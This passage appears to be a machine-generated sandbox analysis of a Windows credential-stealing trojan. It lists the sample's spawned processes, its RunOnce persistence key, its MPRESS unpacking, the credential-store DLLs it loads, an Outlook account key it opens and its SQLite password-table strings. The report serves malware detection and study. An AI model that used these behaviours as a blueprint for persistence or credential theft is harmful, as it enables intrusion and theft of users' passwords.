              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935846191.000000003683B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000000.2272003624.0000000000444000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesyveres.exeP vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2610614922.0000000005571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exeBinary or memory string: OriginalFileName vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exe, 00000006.00000000.2592501851.0000000000444000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesyveres.exeP vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exe, 00000007.00000000.2592737590.0000000000444000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesyveres.exeP vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exeBinary or memory string: OriginalFilename vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exe, 00000008.00000000.2593918186.0000000000444000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesyveres.exeP vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exeBinary or memory string: OriginalFilenamesyveres.exeP vs z120X20SO__UK__EKMELAMA.exe
              Source: z120X20SO__UK__EKMELAMA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/20@3/3
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,6_2_004182CE
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403348
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,8_2_00410DE1
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,6_2_00413D4C
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_0040216B LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_0040216B
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,6_2_0040B58D
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile created: C:\Users\user\AppData\Roaming\AnnegreteJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeMutant created: \Sessions\1\BaseNamedObjects\kajoutr-APT2XH
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile created: C:\Users\user\AppData\Local\Temp\nsj32E1.tmpJump to behavior
              Source: z120X20SO__UK__EKMELAMA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935707605.0000000036730000.00000040.10000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609904766.000000000278A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: z120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile read: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_7-32983
              Source: unknownProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\ncfbreymgdrzyrcdisjodicyn"
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\qekmsxigulkljfqhsveponxhojry"
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\aypetpthqtcqlmmtjgrrrasywyazfan"
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\ncfbreymgdrzyrcdisjodicyn"Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\qekmsxigulkljfqhsveponxhojry"Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\aypetpthqtcqlmmtjgrrrasywyazfan"Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile opened: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.cfgJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: z120X20SO__UK__EKMELAMA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeUnpacked PE file: 6.2.z120X20SO__UK__EKMELAMA.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeUnpacked PE file: 7.2.z120X20SO__UK__EKMELAMA.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeUnpacked PE file: 8.2.z120X20SO__UK__EKMELAMA.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: 00000000.00000002.2278025143.0000000004C7D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_6F951A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F951A98
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_6F952F60 push eax; ret 0_2_6F952F8E
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_36861219 push esp; iretd 4_2_3686121A
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_36852806 push ecx; ret 4_2_36852819
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044693D push ecx; ret 6_2_0044694D
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044DB70 push eax; ret 6_2_0044DB84
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0044DB70 push eax; ret 6_2_0044DBAC
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00451D54 push eax; ret 6_2_00451D61
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0044B090 push eax; ret 7_2_0044B0A4
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_0044B090 push eax; ret 7_2_0044B0CC
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_00444E71 push ecx; ret 7_2_00444E81
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00414060 push eax; ret 8_2_00414074
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00414060 push eax; ret 8_2_0041409C
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00414039 push ecx; ret 8_2_00414049
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_004164EB push 0000006Ah; retf 8_2_004165C4
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00416553 push 0000006Ah; retf 8_2_004165C4
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00416555 push 0000006Ah; retf 8_2_004165C4
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile created: C:\Users\user\AppData\Local\Temp\Melosa\Tabelopstninger.exeJump to dropped file
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile created: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AlcoholJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AlcoholJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AlcoholJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AlcoholJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004047CB
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeAPI/Special instruction interceptor: Address: 55B1DD3
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeAPI/Special instruction interceptor: Address: 2151DD3
